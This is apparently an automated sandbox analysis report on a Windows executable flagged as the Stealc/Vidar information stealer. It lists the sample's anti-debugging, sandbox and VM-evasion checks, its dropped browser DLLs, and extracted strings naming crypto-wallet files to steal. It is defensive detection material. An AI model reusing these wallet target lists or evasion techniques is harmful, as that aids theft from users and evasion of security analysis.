Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44977 second address: E44996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8CE4DC41A6h 0x0000000a jmp 00007F8CE4DC41B4h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E44996 second address: E449BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D04Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8CE470D054h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E449BB second address: E449BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E446B9 second address: E446C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jo 00007F8CE470D046h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55702 second address: E5570C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F8CE4DC41A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5570C second address: E55714 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55714 second address: E55718 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55718 second address: E5572E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8CE470D04Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5572E second address: E55732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55732 second address: E55736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55A56 second address: E55A7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CE4DC41ACh 0x00000008 jmp 00007F8CE4DC41B2h 0x0000000d je 00007F8CE4DC41A6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E55CED second address: E55CF7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8CE470D046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E59163 second address: E5916F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F8CE4DC41A6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5916F second address: E59173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5BCCA second address: E5BD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F8CE4DC41AFh 0x0000000f jl 00007F8CE4DC41A6h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F8CE4DC41B7h 0x0000001d nop 0x0000001e mov dword ptr [ebp+122D2E41h], edx 0x00000024 push 00000004h 0x00000026 add dx, 3330h 0x0000002b call 00007F8CE4DC41A9h 0x00000030 push esi 0x00000031 push ecx 0x00000032 jnl 00007F8CE4DC41A6h 0x00000038 pop ecx 0x00000039 pop esi 0x0000003a push eax 0x0000003b jo 00007F8CE4DC41C4h 0x00000041 pushad 0x00000042 jnp 00007F8CE4DC41A6h 0x00000048 jmp 00007F8CE4DC41B6h 0x0000004d popad 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5BD5D second address: E5BD68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8CE470D046h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA027E second address: 4CA0283 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0328 second address: 4CA033D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA033D second address: 4CA0389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE4DC41B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop esi 0x0000000f pushfd 0x00000010 jmp 00007F8CE4DC41AFh 0x00000015 sub esi, 22593E0Eh 0x0000001b jmp 00007F8CE4DC41B9h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0389 second address: 4CA03AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CE470D04Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03AF second address: 4CA03B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03B5 second address: 4CA03B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03B9 second address: 4CA03D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8CE4DC41B1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA03D7 second address: 4CA03EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C7A8 second address: D7C7BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8CE4DC41A6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D7C7BD second address: D7C7D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CE470D056h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BD1C48 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BCF166 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: BD1B98 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: DFB94D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\file.exe API coverage: 10.0 %
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00984910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00984910
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0097DA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0097E430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0097F6B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00983EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00983EA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_009716D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0097BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_009838B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_0097ED20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00984570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00984570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0097DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0097DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00971160 GetSystemInfo,ExitProcess, 0_2_00971160
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: file.exe, file.exe, 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware!
Source: file.exe, 00000000.00000002.1931818281.0000000000887000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1931818281.0000000000873000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C625FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C625FF0
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009745C0 VirtualProtect ?,00000004,00000100,00000000 0_2_009745C0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00989860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00989860
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00989750 mov eax, dword ptr fs:[00000030h] 0_2_00989750
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_009878E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA, 0_2_009878E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C5FB66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C5FB1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
Searches for specific processes (likely to inject)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00989600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_00989600
Source: file.exe, file.exe, 00000000.00000002.1932376459.0000000000D4F000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: _kProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FB341 cpuid 0_2_6C5FB341
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\file.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00987B90
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00987980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, 0_2_00987980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00987850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00987850
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00987A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00987A30

Stealing of Sensitive Information
barindex
Yara detected Stealc
Source: Yara match File source: 0.2.file.exe.970000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1931818281.000000000082E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1932014519.0000000000971000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1734725607.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 7568, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe, 00000000.00000002.1931818281.00000000008E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonnb
Source: file.exe String found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
Source: file.exe String found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
Source: file.exe String found in binary or memory: inance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger L
Source: file.exe String found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
